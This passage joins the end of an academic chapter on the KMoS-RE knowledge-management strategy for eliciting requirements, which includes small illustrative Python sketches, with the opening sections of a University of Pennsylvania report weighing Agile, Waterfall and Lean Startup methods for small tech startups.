Domain knowledge is the knowledge of the area to which a set of theoretical concepts is applied. In ISD, the concept of domain knowledge has two meanings. Firstly, solution domain knowledge corresponds to the methods, techniques and tools that form the basis for the development of the product or solution. Secondly, those products or solutions are developed to meet the necessities of real-world problems that exist in an application domain. Thus, both solution domain knowledge and application domain knowledge are necessary to develop the product or solution [20]. Asymmetry of knowledge, or symmetry of ignorance, refers to the knowledge gap that exists between domain specialists, owners of the application domain knowledge, and requirements engineers, owners of the solution domain knowledge [5]. In ISDs, this phenomenon is amplified by the large amount of tacit knowledge involved. When the gap is large, there is no cognitive empathy and the communication process is not effective. Therefore, requirements engineers could produce models that do not represent reality.

## 3. Knowledge management

Knowledge management (KM) is a discipline with the aim of enhancing an organization by sharing and managing the knowledge flow among its people [5]. KM is much more than just the use of information technology to manage knowledge. Due to the complexity of dealing with knowledge, this discipline has developed theoretical concepts in order to explain and face the underlying problems of elicitation, creation, exchange and validation of knowledge.
According to Pilat and Kaindl [5], there are three fundamental concepts in KM closely related to requirements elicitation: the knowledge transfer and transformation process, the distinction between explicit and tacit knowledge, and the issues of knowledge exchange. In addition, we consider that a knowledge creation process, in which the knowledge of all involved in the project evolves, is also present in ISD.

### 3.1. Knowledge transfer and transformation process

The knowledge transfer process is carried out when the knowledge of a person is transformed into natural language, and into non-verbal channels of human communication, in order to be transferred to another person, who then decodes this knowledge according to their own interpretation. Any transfer of knowledge is inherently bound to a knowledge transformation, so there will always be some degree of ambiguity. Ambiguity affects the elicitation of correct requirements because the people involved in the project could build different, and possibly incompatible, interpretations of the concepts, relations and processes of the domain. Linguists point to several sources of ambiguity, such as lexical, syntactic, semantic and pragmatic. ISD produce an additional kind of ambiguity, named nocuous ambiguity, which arises when two people are mutually unaware that each holds a different interpretation. In this situation, they end up talking about different concepts while thinking that they are talking about the same topic. According to Gacitua et al. [18], no person involved in the process can be aware of this phenomenon, because they do not have access to each other's tacit knowledge.

### 3.2. Conversion of tacit knowledge to explicit

Nonaka and Takeuchi [7] propose a model of knowledge conversion in organizations based on Polanyi's theory of tacit knowledge. For them, knowledge creation in an organization is the result of social interaction through which tacit and explicit knowledge is transferred.
The model postulates four iterative conversion modes, socialization, externalization, combination and internalization (SECI), which are described as follows:

- **Socialization** is the process of transferring tacit knowledge among individuals by sharing mental models and technical skills.
- **Externalization** is the process of converting tacit knowledge to explicit knowledge through the development of models, protocols and guidelines.
- **Combination** is the process of recombining or reconfiguring existing bodies of explicit knowledge to create new explicit knowledge.
- **Internalization** is the process of learning by repetition of tasks that apply explicit knowledge. Individuals absorb the knowledge as tacit knowledge again.

According to Nonaka, if this cycle is performed consciously, looping through this knowledge spiral may evolve the overall knowledge held collectively. The spiral of knowledge can be applied to requirements elicitation in order to face the inherent knowledge management challenges of the process. Despite that, we found only a few studies that explore this possibility. Wan et al. [21] proposed a model of knowledge conversion for the requirements elicitation process with the aim of minimizing the symmetry of ignorance between developers and domain specialists. The authors base their model on the SECI model and consider the knowledge flowing between domain specialists and developers. They introduced a new agent into the process: the requirements specialist. This person acts as an intermediary between the domain specialists and the developers, so he or she must earn the trust of those involved in the process. The authors use their model to analyse the requirements elicitation process of a real software development project. In conclusion, the authors argue that the proposed model can reduce the symmetry of ignorance and facilitate the elicitation of tacit requirements.
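As a purely illustrative summary (the dictionary, the ordering list and the function below are our own sketch, not part of Nonaka's model or of any published tooling), the four modes can be characterized by the kind of knowledge each takes as input and produces as output:

```python
# Illustrative sketch of the SECI conversion modes: each mode maps one
# kind of knowledge (tacit or explicit) to another. All names are ours.
SECI_MODES = {
    "socialization":   ("tacit", "tacit"),        # sharing mental models and skills
    "externalization": ("tacit", "explicit"),     # models, protocols, guidelines
    "combination":     ("explicit", "explicit"),  # recombining explicit knowledge
    "internalization": ("explicit", "tacit"),     # learning by repetition
}

# The order in which the modes follow each other in one loop of the spiral.
ORDER = ["socialization", "externalization", "combination", "internalization"]

def next_mode(mode: str) -> str:
    """Return the mode that follows `mode` in one loop of the knowledge spiral."""
    return ORDER[(ORDER.index(mode) + 1) % len(ORDER)]
```

The wrap-around in `next_mode` (internalization is followed by socialization again) reflects the iterative character of the spiral described above.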
Nevertheless, to be successful in the process, they suggest that the requirements specialists must have enough domain knowledge. We consider it difficult, if not impossible, for one person to know about every domain, so the incorporation of this new agent could hinder an already complex elicitation process. On the other hand, Vásquez-Bravo et al. [22] proposed a classification of elicitation techniques, based on the phases of Nonaka's model, to facilitate their selection in an RE process. However, they do not propose how to use these techniques or how to elicit tacit knowledge.

### 3.3. Knowledge sharing

In order to implement the knowledge spiral properly, it is crucial to facilitate the exchange of knowledge among all involved in the project [16]. This implies focusing on the knowledge holders, especially in ISD, where knowledge is mostly tacit. This task may become difficult to handle because requirements engineers can be confronted with several persons whom they do not know. KM offers the concept of the knowledge map [5], an artefact that points to knowledge but does not contain it. The artefact could be a table or a matrix indicating which person has what knowledge. The knowledge map should be created and initialized at the beginning of the process and continually updated as the spiral of knowledge evolves. A knowledge map is also useful for discovering for which pieces of knowledge a holder might be missing. In ISD, we assume that a knowledge map would also be useful for indicating the tacitness level of the knowledge holders. Thus, we propose the piece of knowledge (PoK) matrix, an artefact that fulfils the functions mentioned above and is used in the KMoS-RE© strategy. The PoK matrix is a data structure that stores the relation of every individual (solution solver or domain specialist) involved in the project with every piece of knowledge about the domain. A piece of knowledge can be a concept, a relationship or a behaviour.
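The PoK matrix can be pictured as a simple table of binary values relating people to pieces of knowledge. The Python class below is a minimal sketch under the assumption of a 0/1 encoding (0 = still tacit, 1 = made explicit); the class and method names are hypothetical and not part of the published strategy:

```python
class PoKMatrix:
    """Piece-of-knowledge matrix: rows are people (domain specialists or
    solution solvers), columns are pieces of knowledge (concepts,
    relationships or behaviours). 0 = still tacit, 1 = made explicit.
    Illustrative sketch only; all names are assumptions."""

    def __init__(self, people, pieces):
        self.people = list(people)
        self.pieces = list(pieces)
        # Every (person, piece) cell starts at 0: all knowledge begins tacit.
        self.cells = {(p, k): 0 for p in self.people for k in self.pieces}

    def make_explicit(self, person, piece):
        """Record that `person` has externalized `piece` (cell goes 0 -> 1)."""
        self.cells[(person, piece)] = 1

    def tacit_pieces(self):
        """Pieces of knowledge that no one has yet made explicit."""
        return [k for k in self.pieces
                if all(self.cells[(p, k)] == 0 for p in self.people)]
```

For example, after `pok = PoKMatrix(["specialist", "engineer"], ["concept A", "relation B"])` and `pok.make_explicit("specialist", "concept A")`, the call `pok.tacit_pieces()` would flag `"relation B"` as knowledge still to be elicited.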
The PoK matrix is used as a reference to figure out which concepts, relationships or behaviours have been made explicit and which of them remain tacit. The aim of the KMoS-RE© strategy is to transform as many values as possible in the PoK matrix from 0 to 1, in order to make explicit as much tacit knowledge as possible. It would be ideal if the requirements engineers could make all pieces of knowledge explicit. However, there will always be knowledge that cannot be converted to explicit; therefore, the requirements engineers must propose the most suitable solution with the explicit knowledge obtained at a particular moment.

### 3.4. Knowledge evolution spiral

As mentioned above, in ISD, understanding the problem and structuring the solution are intertwined. The problem solvers, that is, the requirements engineers, must explore different areas of the problem to find a solution. In order to accomplish this task, they should dialogue with the domain specialists, who have their own domain knowledge and their own perspective on the possible solution. By performing this task, the knowledge of the problem solvers about the application domain evolves. If necessary, they can return to previous states of the project, but their knowledge is not the same: they have additional knowledge that allows them to explore new possibilities of solution. In summary, the knowledge of the problem and its solution gradually evolves as requirements engineers gain more knowledge of the application domain through social interaction and their involvement with the business processes. In order to model that behaviour, the knowledge evolution model for requirements elicitation (KEM-RE) was developed based on the SECI model.
The KEM-RE is an iterative cycle (Figure 4) that consists of four stages, covering the four kinds of knowledge processes involved in the innovation of complex problem solving:

- **Knowledge elicitation (KE) stage.** The requirements engineers elicit knowledge from the domain specialists and vice versa. The socialization mode predominates.
- **Knowledge integration and application (KI & A) stage.** The requirements engineers integrate the acquired knowledge and their own experience into models. This is a complex activity in which the combination and externalization modes are present. In addition, as the requirements engineers develop models, they internalize the domain knowledge.
- **Knowledge sharing and exchange (KS & E) stage.** The models developed by the requirements engineers are shared with the domain specialists. This phase takes place through socialization.
- **Knowledge validation (KV) stage.** The domain specialists validate the models. In order to carry out this activity, they must internalize the knowledge behind the models through a cognitive dialogue. This process leads to the elicitation of new knowledge. Then the cycle starts again.

## 4. KMoS-RE©: an approach from the knowledge management discipline

The KMoS-RE© strategy [6] is a high-level plan to achieve a set of requirements of a solution or product through the eliciting, structuring and creating of knowledge. Following the work of [24], the strategy consists of three phases, domain modelling (DM), system modelling (SM) and specification development (SD), and structures its flow of activities according to the KEM-RE. Furthermore, it includes transversal activities to identify and make explicit as much tacit knowledge as possible. Those activities are driven by the identification of presuppositions [18] and the classification of verbs according to Bloom's taxonomy [23]. The strategy also includes artefacts to facilitate knowledge sharing: a record of wrong beliefs and the PoK matrix (Section 4.3).
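Since the strategy's flow of activities follows the KEM-RE, it may help to lay out the four stages of Section 3.4, together with the SECI modes that predominate in each, in schematic form. The Python below is purely illustrative; the abbreviations come from the text, everything else is our own sketch:

```python
# KEM-RE stages in order, paired with the SECI mode(s) that predominate
# in each stage, as described in Section 3.4. Purely schematic.
KEM_RE_CYCLE = [
    ("KE",   "knowledge elicitation",                 ["socialization"]),
    ("KI&A", "knowledge integration and application", ["combination", "externalization", "internalization"]),
    ("KS&E", "knowledge sharing and exchange",        ["socialization"]),
    ("KV",   "knowledge validation",                  ["internalization"]),
]

def iterations(n_cycles):
    """Yield (cycle_number, stage_abbreviation) pairs for repeated passes
    through the cycle, reflecting its iterative nature."""
    for cycle in range(1, n_cycles + 1):
        for abbrev, _name, _modes in KEM_RE_CYCLE:
            yield cycle, abbrev
```

Two passes through `iterations(2)` would visit KE, KI&A, KS&E and KV twice, mirroring the "then the cycle starts again" behaviour described above.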
A brief explanation of each phase is provided as follows:

- **Domain modelling phase (DM).** In this phase, the terms, i.e. the concepts, attributes and relationships, and the basic integrity restrictions are formalized through a consensus, in order to understand the application domain without worrying about the solution. The terms are recorded in the Knowledge of Domain on an Extended Lexicon (KDEL), a lexicon that classifies them into objects, subjects and verbs. The KDEL is used to facilitate the building of a graphical conceptual model. The externalization of this knowledge enables the achievement of a consensus among the stakeholders and hence minimizes the symmetry of ignorance. The concepts and relationships identified in this phase generate the first version of the piece of knowledge (PoK) matrix. In addition, a graphical conceptual model is required in order to facilitate the cognitive dialogue with the domain specialists. The requirements engineers decide what kind of conceptual model to use, from entity-relationship models to ontologies, depending on the characteristics of the domain.
- **System modelling phase (SM).** In this phase, the current and future system processes are formalized. The current system corresponds to the system as it exists at present. The future system represents the system after the deployment of a solution or product. The Use Cases technique was selected to model the system, both current and future, because its usefulness has been demonstrated over time. The system model is obtained from the KDEL and the conceptual model. The behaviours identified in this phase also change the values of the PoK matrix.
- **Specification development phase (SD).** In this phase, the requirements are derived from the Use Cases' scenarios of the future system and incorporated into the solution requirements specification (SIRS).

Figure 5 depicts a general view of the KMoS-RE© strategy in a unified modelling language (UML) activity diagram.
Every activity of the strategy corresponds to one stage of the KEM-RE: model validation (MV) is related to knowledge validation (KV), knowledge elicitation (KE) is related to the stage of the same name, model discussion (MD) corresponds to knowledge sharing and exchange (KS & E), and domain modelling (DM), system modelling (SM) and specification development (SD) correspond to knowledge integration and application (KI & A). The swim lanes in the figure represent the activities developed by each type of actor.

![Figure 5. Knowledge management on a strategy for RE.](http://dx.doi.org/10.5772/intechopen.70071)

### 4.1. KMoS-RE© analysis

According to Maalej and Thurimella [24], managing requirements knowledge is about efficiently identifying, accessing, externalizing and sharing domain and technical knowledge by and to all involved in the project, including analysts, developers and domain specialists, which is closely related to a full perspective of KM. The rationale of the KMoS-RE© strategy is based on the fundamental issues described as follows:

- The flow of activities in the KMoS-RE© strategy is based on the knowledge evolution model KEM-RE, which is in turn based on the knowledge evolution spiral proposed by Nonaka. The knowledge evolution spiral has the aim of facilitating the conversion of tacit knowledge to explicit. In addition, the incorporation of techniques such as the identification of presuppositions and the classification of verbs according to Bloom's taxonomy makes it easier to identify knowledge that could be tacit, and hence hidden.
- Representing requirements knowledge targets efficient information access and artefact reuse within and between projects. The KMoS-RE© strategy proposes several artefacts in order to represent different views of the system. They can be accessed and shared by all involved in the project.
Although several requirements elicitation proposals use lexicons, conceptual models, use case models and scenarios, few of them combine those techniques in a strategy. Besides, the KMoS-RE© strategy proposes two innovative artefacts: the record of wrong beliefs and the PoK matrix.

- Sharing requirements knowledge improves the collaboration among all involved in the project and ensures that their experiences do not get lost. The knowledge spiral on which the activities of the KMoS-RE© strategy are based compels solution solvers and domain specialists to share knowledge through socialization.
- Reasoning about requirements and their interdependencies aims at detecting inconsistencies and deriving new knowledge. Externalizing the knowledge through the development of the different artefacts lets the solution solvers reason about and internalize the domain knowledge.

### 4.2. KMoS-RE© applied to real ISD cases

The KMoS-RE© strategy has been applied in the development of solutions for several real ISD cases:

- **Software development for complex domains.** This is a complex and creative activity in which software developers should understand, as soon as possible, the knowledge of a domain in which they are generally neophytes, and then combine this knowledge with their own technical knowledge in order to reach a solution that meets the clients' expectations. The KMoS-RE© strategy has been used to develop a cognitive rehabilitation system for multiple sclerosis patients [6].
- **Soft computing.** This artificial intelligence (AI) subarea includes several techniques that are suitable for solutions in ISD, since it is tolerant of imprecision, uncertainty, partial truth and approximation. A complex problem in soft computing is how to elicit the knowledge of specialists in order to incorporate it into an appropriate representation and to reach correct solutions.
A case-based reasoning system to support heating, ventilation and air conditioning (HVAC) design decisions was developed using the KMoS-RE© strategy [8].

• **Intelligent tutoring systems.** Over the past decade, intelligent tutoring systems have become increasingly accepted as viable learning tools in academia and industry. However, most of these solutions have been developed for well-defined domains. Informally structured domains, such as computer programming, law and ethics, present a number of unique challenges for researchers in intelligent tutoring, especially regarding the representation and evaluation of knowledge. We are currently exploring the adaptation of the KMoS-RE© strategy with the aim of obtaining a method to develop Bayesian networks for evaluation in intelligent tutoring systems in the context of ISD.

• **Industrial design.** The KMoS-RE© strategy has been used as an HVAC requirements process in a real company [8]. HVAC design is a difficult task because the information necessary for solving the problem is incomplete and vague. This knowledge belongs to the domain specialists, generally a set of specialists from different fields, such as mechanical engineers, control engineers, electrical engineers and architects. In addition, there can be multiple and controversial solutions, and the criteria that determine the best design solution are complex and imprecise.

### 4.3. Discussion

Nowadays, the negative effects of inappropriate, incorrect and ambiguous requirements have been widely studied and are well known. Despite the vast quantity of proposals, methods, techniques and tools, requirements elicitation is still an open problem, as shown by the many projects that do not fulfil clients' expectations or that exceed the development time due to badly elicited requirements. Thus, there are still clear opportunities for improvement.
The application of the KMoS-RE© strategy in real ISD cases has shown that its characteristics are clear contributions to the requirements elicitation area, as described as follows:

• **Emphasis on application domain knowledge.** The importance of application domain knowledge for improving the requirements elicitation process is widely accepted. However, most of the current methods and tools for requirements elicitation are designed for general problem domains, where problem-specific domain knowledge is not completely necessary [25]. The KMoS-RE© strategy emphasizes the importance of the application domain knowledge, either tacit or explicit, besides proposing techniques and methods to facilitate its discovery, representation, sharing and appropriation among all involved in the project. Thus, the strategy can be applied in knowledge-intensive projects.

• **Generality and adaptability.** The theoretical concepts of knowledge management, on which the KMoS-RE© strategy is founded, allow it to be applied to domains with different levels of informality. It also has the advantage of being a high-level plan; therefore, the requirements engineers have the authority to decide which phases are necessary. In some cases, they can even choose between different techniques and methods.

• **Evolutive.** The strategy is not limited to what has been proposed so far. The model allows the incorporation of new proposals, from methods and techniques to knowledge management models or perspectives on requirements elicitation. For example, we are currently analysing the adaptation of a goal-based elicitation approach [26], the knowledge audit model [25] and social network analysis [27].
- **Algorithmic.** Despite its generality and adaptability, the KMoS-RE© strategy is algorithmic in the sense that the process of its implementation is well defined and bounded, so the requirements engineers do not need a deep knowledge of the theoretical concepts of knowledge management. Most of the cases shown in the previous section were led by undergraduate engineering students [8], although a process of raising awareness of the issues of informally structured domains is always recommended.

Finally, we would like to emphasize that the most important contribution of the KMoS-RE© strategy is that it does not try to work against human nature; it recognizes human capabilities and limitations and builds the best possible proposal based on them. Thus, according to the above and the valuable results of the application of the KMoS-RE© strategy in several different contexts, it can already be considered a serious approach to requirements elicitation knowledge.

## 5. Conclusions and future works

The KMoS-RE© strategy is a novel approach from KM to face the challenges of eliciting knowledge and creatively transforming it into a set of requirements of a product or solution, in order to satisfy the needs and fulfil the expectations of clients and users. The strategy is focused on dealing with ISD. Due to the characteristics of these domains, the strategy has a full KM perspective, i.e. it incorporates knowledge engineering techniques in order to properly manage tacit knowledge. The domain modelling phase handles the problem of formalizing the concepts and relationships, or at least reaching a consensus about them. The system modelling phase deals with the problem of structuring the processes in the domain. Thus, the problem of handling tacit knowledge has been properly addressed by the KMoS-RE© strategy. The strategy was applied to several real ISD cases in different and diverse areas. The solutions achieved provide evidence of its usefulness, value and generality.
Therefore, the application of the KMoS-RE© strategy in several real cases shows that it is a useful approach for eliciting the requirements of solutions or products, especially in ISD. Finally, the challenge of managing tacit knowledge requires analysing more cases in order to improve all the KM approaches, including the KMoS-RE© strategy.

Author details

Karla Olmos-Sánchez* and Jorge Rodas-Osollo

*Address all correspondence to: kolmos@uacj.mx

Autonomous University of Ciudad Juárez, Ciudad Juárez, Chihuahua, México

References
1-1-2013

Is a Rigorous Agile Methodology the Best Development Strategy for Small Scale Tech Startups?

Alex Yau, *University of Pennsylvania*, ayau@sas.upenn.edu
Christian Murphy, *University of Pennsylvania*, cdmurphy@seas.upenn.edu

**Recommended Citation:** [http://repository.upenn.edu/cis_reports/980](http://repository.upenn.edu/cis_reports/980) (posted at ScholarlyCommons)
**Keywords:** Agile methodology, Lean Startup, small scale tech startup. **Disciplines:** Computer Engineering. This technical report is available at ScholarlyCommons: http://repository.upenn.edu/cis_reports/980

Is a Rigorous Agile Methodology the Best Development Strategy for Small Scale Tech Startups?

Alex Yau and Christian Murphy
Department of Computer and Information Science
University of Pennsylvania
Philadelphia PA 19104
ayau@sas.upenn.edu, cdmurphy@seas.upenn.edu

Abstract—Recently, Agile development processes have become popular in the software development community, and have been shown to be effective in large organizations. However, given that the communication and cooperation dynamics in startup companies are very different from those of larger, more established companies, and the fact that the initial focus of a startup might be significantly different from its ultimate goal, it is questionable whether a rigid process model that works for larger companies is appropriate in tackling the problems faced by a startup. When we scale down even further and observe the small scale startup with only a few members, many of the same problems that Agile methodology sets out to solve do not even exist. Then, for a small scale startup, is it still worth putting the resources into establishing a process model? Do the benefits of adopting an Agile methodology outweigh the opportunity cost of spending the resources elsewhere?
This paper examines the advantages and disadvantages of adopting an Agile methodology in a small scale tech startup and compares it to other process models, such as the Waterfall model and Lean Startup. In determining whether a rigorous Agile methodology is the best development strategy for small scale tech startups, we consider the metrics of cost, time, quality, and scope in light of the particular needs of small startup organizations, and present a case study of a company that has needed to answer this very question.

Index Terms—Agile methodology, Lean Startup, small scale tech startup.

I. INTRODUCTION

In recent years, there has been an increased focus on the managerial and organizational aspects of software engineering in tech startups. Software process models are being created and changed constantly with the belief that better process models can ultimately lead to the success of a company. Recently, Agile methodology has become popular in the software development community. Some consider it the best thing that has happened to the software industry, and perhaps a possible “Silver Bullet” to solve the problems of software development. Over the years, the Agile methodology has proven successful in many large companies [12]. However, we must understand that the communication and cooperation dynamics in startups are very different from those of larger, more established companies, and therefore startups may have problems and concerns that do not apply to giant corporations. Although companies ultimately share the same business goals, “Faster, Cheaper and Better”, the initial focus of a startup might be significantly different from its ultimate goal. Depending on the current business environment, the immediate business goal for a startup may change constantly to react to these changes. Therefore, a rigid process model that works for larger companies may be inefficient in tackling the problems faced by a startup.
Furthermore, startups are faced with limitations that their larger counterparts may take for granted. With limited resources and, in many cases, constant direct competition, allocating human resources to defining and maintaining a rigorous methodology is out of the question for some. However, the Agile methodology has been shown to be successful in many case studies and research efforts [8]. But is it one-size-fits-all? In tech startups, Agile definitely has clear benefits over some of the other, traditional methods. It rests on solid principles and has been shown in past case studies to mitigate certain problems faced by companies. However, when we scale down even further and observe the “small scale” startup with, say, only three members, many of the same problems that Agile methodology sets out to solve do not even exist. For example, with three members working in a small office, the problem of communication becomes insignificant compared to the problem of communication in a 100-person startup. Then, for a small scale startup, is it still worth putting the resources into establishing a process model? Do the benefits of adopting an Agile methodology outweigh the opportunity cost of spending the resources elsewhere? This paper examines the advantages and disadvantages of adopting an Agile methodology in a small scale tech startup, compares it to other process models, such as the Waterfall model and Lean Startup, and attempts to answer the question, “Is a rigorous Agile methodology the best development strategy for small scale tech startups?”

II. SCOPE

Before we begin, it is essential to define the scope of the proposed question. Since Agile software development can be considered merely “a collection of practices, a frame of mind” [6], it is difficult to tell whether a company’s process model qualifies as Agile. Some may choose to follow Agile beliefs loosely while others may employ a strict Agile system.
Therefore, it is important to distinguish companies with different levels of “agility” in order to properly analyze the effectiveness of the Agile system. In the scope of this paper, a rigorous Agile methodology will be defined as one that follows *all* the Agile principles and strict practices, similar to Extreme Programming and Scrum. Secondly, as briefly mentioned earlier, Agile development may have different effects on a company depending on its stage and size. The cost of implementing the Agile methodology and its benefits vary as the company grows. This paper focuses on the effects of Agile on a “small scale” startup, one composed of roughly eight members or fewer. This is a good scope to focus on since a majority of startups begin with roughly two to three founding members and perhaps a few more engineers [26]. Thus, the discussion will mostly concentrate on the cost of implementing the Agile system in a startup of such a scale and the benefits and impact it has from the perspective of the early small scale startup. Lastly, in order to answer the proposed question and determine if a rigorous Agile methodology is “the best development strategy”, we must first discuss the scope of the metrics that we are using to determine the effectiveness of a process model. The metrics used in this discussion are cost, time, quality and scope as they apply to a startup. This paper will thus compare the effectiveness of different process models based on their effects on the four areas mentioned. These metrics will be defined fully in Section IV below.

III. METHODOLOGY

This section outlines the necessary steps required to answer the proposed question, “Is a rigorous Agile methodology the best development strategy for small scale tech startups?” We first begin by observing the problems of software development and defining the four metrics – cost, time, quality and scope – and the tradeoffs associated with them from the perspective of a small scale startup (Section IV).
We will then discuss some of the traditional process models, such as the Waterfall model, and their effects on the four metrics (Section V). The paper will then follow with a detailed definition of the Agile methodology, its principles and the practices associated with it, such as Extreme Programming and Scrum. The impact of Agile methodology on the four metrics will be compared with the traditional process models and its implications for small scale tech startups will be addressed (Section VI). A popular alternative to the Agile methodology, the Lean Startup, will then be discussed and compared to Agile (Section VII). A thorough case study on a small scale tech startup, Everyme, will be presented and used as an example of a Lean Startup that does not employ a strict Agile methodology (Section VIII). The paper ends with a proposed solution to the question raised.

IV. METRICS

Since process models are tools of project management, in order to analyze the quality of a process model, we must first consider the goals of project management itself. According to Olsen’s article “Can Project Management Be Defined?”, project management is “the application of a collection of tools and techniques...toward the accomplishment of a...task within time, cost and quality constraints” [17]. Similarly, the British Standard for project management [2][9] defines project management as “the planning, monitoring and control of all aspects of a project...to achieve the project objectives on time and to the specified cost, quality and performance.” In the scope of this paper, we focus on the process model as the tool that is used to accomplish a task according to the metrics of time, cost and quality constraints. Time, cost, scope and quality make up what is commonly known as the iron triangle [2][9] or triple constraints of project management. The iron triangle is a visual representation of the common tradeoffs of project management.
It suggests that in order to increase the scope of a project, time and cost must suffer in order to keep the same quality, and vice versa. Therefore, by analyzing the impact of a process model on the time, cost, scope and quality of software being developed, we can assess the effectiveness of the model or methodology. In the scope of software development in small scale tech startups, the four metrics can be defined as:

- **Time** - The total time taken from the start of the project to a public release of the product or service
- **Cost** - The total cost spent by the startup, including the cost of hiring engineers
- **Scope** - The number of features and extensions (such as language localization) of the product
- **Quality** - This includes both internal quality, such as testability and maintainability, and external quality, such as usability and reliability

V. TRADITIONAL PROCESS MODELS

One of the more popular traditional process models is the Waterfall model. The Waterfall model has been around since the 1970s and is “a framework for software development in which development proceeds sequentially through a series of phases” [14]. The progress flows from one phase to another in order, although short feedback loops are allowed. It is possible to move backwards and make modifications based on the feedback, but otherwise the system generally follows these distinct steps:

1. **Requirements analysis** - The first step is to gather information, define the scope and understand and analyze the specifications of the project.
2. **Design** - The second step is to define the hardware and/or software architecture, modules, interfaces, etc. to satisfy the requirements specified in the first step.
3. **Implementation** - This step consists of actually coding and constructing the software based on the design and requirements established in the previous two steps.
4. **Testing** - In this step, all the components are integrated together and tested to ensure they meet the customer’s specifications as defined in the first step.
5. **Installation** - This step prepares the product for delivery for commercial use.
6. **Maintenance** - The last step involves making modifications to improve the quality and performance of the system based on feedback from the customer.

From the outline of the Waterfall model, we can see some immediate benefits to software development in startups. The model provides a clearly defined structure that enforces discipline for a startup. It provides a clear direction with a transparent way of assessing progress through the use of milestones. Since a direction is not immediately obvious to young startups, and the software development process may be quite unstructured and unorganized, the Waterfall model can not only provide a clear vision and goal for the startup but also a clean software development structure through the use of stages. The Waterfall model also puts a huge emphasis on customer specification analysis, the first step in the model, and on the design structure of the software even before the team starts writing code. If done correctly, this can reduce both cost and time in the software development phase, as it minimizes the time and effort wasted on writing code that does not meet customer specifications or on constant refactoring because of bad code design. Lastly, the Waterfall model may improve the overall quality of software, since flaws in the design and misunderstandings of specifications are handled in the first two steps before the code is written, rather than being caught in the testing stage. Furthermore, since all specifications and design architectures are properly documented after the first two stages, communication time between team members can be greatly reduced.
However, since this model relies on the customer specifications being clearly defined in step one, the specification documents created in the first step may become outdated if the customer changes his mind. In startups, the vision and the scope of the product are usually not fully formed, and thus customer specifications may change drastically from one day to another. Since the phases of the Waterfall model are built on top of each other, such that the design phase follows the specifications defined in step one and the implementation stage depends on the design structure, a lot of time may be wasted if specifications change. This problem is especially amplified in startups because their scope tends to change constantly to adapt to the needs of the customer (or the market) and the need to refine their product. As a result, the cost and time may increase drastically in some cases. Therefore, unless the specifications are clearly defined and unchanging, which is rare in a startup, the Waterfall model may be more detrimental than beneficial to a small scale tech startup.

VI. AGILE

Agile methods are a reaction and a proposed solution to traditional methodologies like the Waterfall model that acknowledge “the need for an alternative to documentation driven, heavyweight software development processes” [8]. In fact, according to Cockburn and Highsmith, Agile software development does not necessarily introduce new practices but is the “recognition of people as the primary drivers of project success, coupled with an intense focus on effectiveness and maneuverability” [7]. At its core, the Agile methodology focuses on incremental and iterative development similar to the spiral model. It aims to avoid detailing and defining the entire project at the beginning like the Waterfall model, and instead to plan out and deliver small parts of the project at a time. The methodology is similar to having small loops of the Waterfall model for each feature in the software.
The development process starts with the most basic set of deliverables, followed by planning, implementing and testing the next set of features in subsequent iterations. The purpose of this development process is to increase the agility of the development team by minimizing the time and cost wasted if the customer decides to change his mind. According to Cohen, Lindvall and Costa, “being Agile involves more than simply following guidelines that are supposed to make a project Agile” [8]. Andrea Branca also states that some “processes may look Agile, but they won’t feel Agile” [6]. However, there are some methodologies and processes with such a great emphasis on Agile beliefs that they can be considered the core of Agile methodology, and they have been widely adopted by top companies in the world. This paper will now explore a few of these Agile methodologies and discuss their effectiveness in a small scale startup.

A. Scrum

Scrum, first introduced by Ken Schwaber in 1996, is a widely used Agile methodology that focuses on developing software in short iterations known as sprints. The process consists of the following stages:

- **Pre-sprint planning** - Features and functionalities are selected from a backlog, and a collection of features is planned and then prioritized to be completed in the next sprint.
- **Sprint** - The team members choose the features they want to work on and begin development. Scrum meetings are held daily, every morning, to aid communication between developers and product managers. A sprint usually lasts between one and six weeks.
- **Post-sprint meeting** - In this meeting, the team analyzes the progress made in the past sprint.

From the perspective of a small startup, this process provides a couple of benefits. The enforced daily meetings can improve communication between team members.
This can not only decrease the time and cost that would otherwise be lost to miscommunication, but can also improve the quality of software, since software can be better designed when each member understands the overall scope of the project and how others are implementing certain parts. Since the overall structure of the software changes much faster in a startup than in a larger company, it is necessary to keep everyone updated in order to achieve good software quality. On the other hand, the pre-sprint planning helps the team narrow down its to-do list and focus on the immediate goal. This is particularly important to startups because the final product is not fully defined, and thus it is easy for developers to fall into the trap of developing too many features instead of concentrating on the main ones. Therefore, by imposing a constraint of time with short iterations, the process helps the team focus on its goal and deliver the necessary features. However, although a constraint of time in Scrum and Agile can narrow the focus and discourage startups from implementing unnecessary features, some may argue that this process harms the scope of the project and limits the creativity that is important in a startup. Iterative development of prioritized features with a time constraint discourages the development team from exploring different ways to implement a certain feature that may perhaps be more efficient or provide more value to the project. Since it is difficult for startups to break into an existing market, innovative designs and implementations of features are particularly important in determining the success of a startup. Therefore, a startup must weigh the tradeoffs of scope and creativity against time and cost when thinking about adopting a more focused and iterative development process.

B. Extreme Programming

Extreme Programming is another methodology that encompasses the core concepts of Agile development, similar to Scrum.
In “Extreme Programming Explained: Embrace Change”, Beck outlined the 12 rules of Extreme Programming [3]. In addition to the rules mentioned in Scrum, like the focus on pre-iteration planning, short releases and simple design, Extreme Programming also encourages other Agile practices. Extreme Programming encourages test-driven development and suggests that the developers write acceptance tests for their code before they implement the features. The benefits of test-driven development are clear: writing test cases before implementing a feature can ensure the feature fulfills the specifications that were set out originally. Furthermore, the quality of software is also improved, not only because of the decrease in bugs and faults in the software but also because of improved maintainability. With tests written for all the features implemented, it is easy to tell whether changing a section of the code is going to affect another section simply by running the test suite. Therefore, test-driven development can definitely increase the quality of software and decrease the cost and time wasted on debugging afterwards. However, do the same benefits apply to a small scale startup? A small scale startup has a limited number of developers, a list of features that is probably being changed and refined constantly, and a limited amount of time and money. Is it worth spending time writing comprehensive test cases for every feature before implementing it? It is very possible that by the time the tests are written, the customer will have changed his mind and the tests will be rendered useless. On the other hand, if the same amount of time had been spent on developing the feature, the code could be recycled for another feature. Furthermore, in many cases, the customer may request a few features as prototypes to test out some ideas in order to make up his mind.
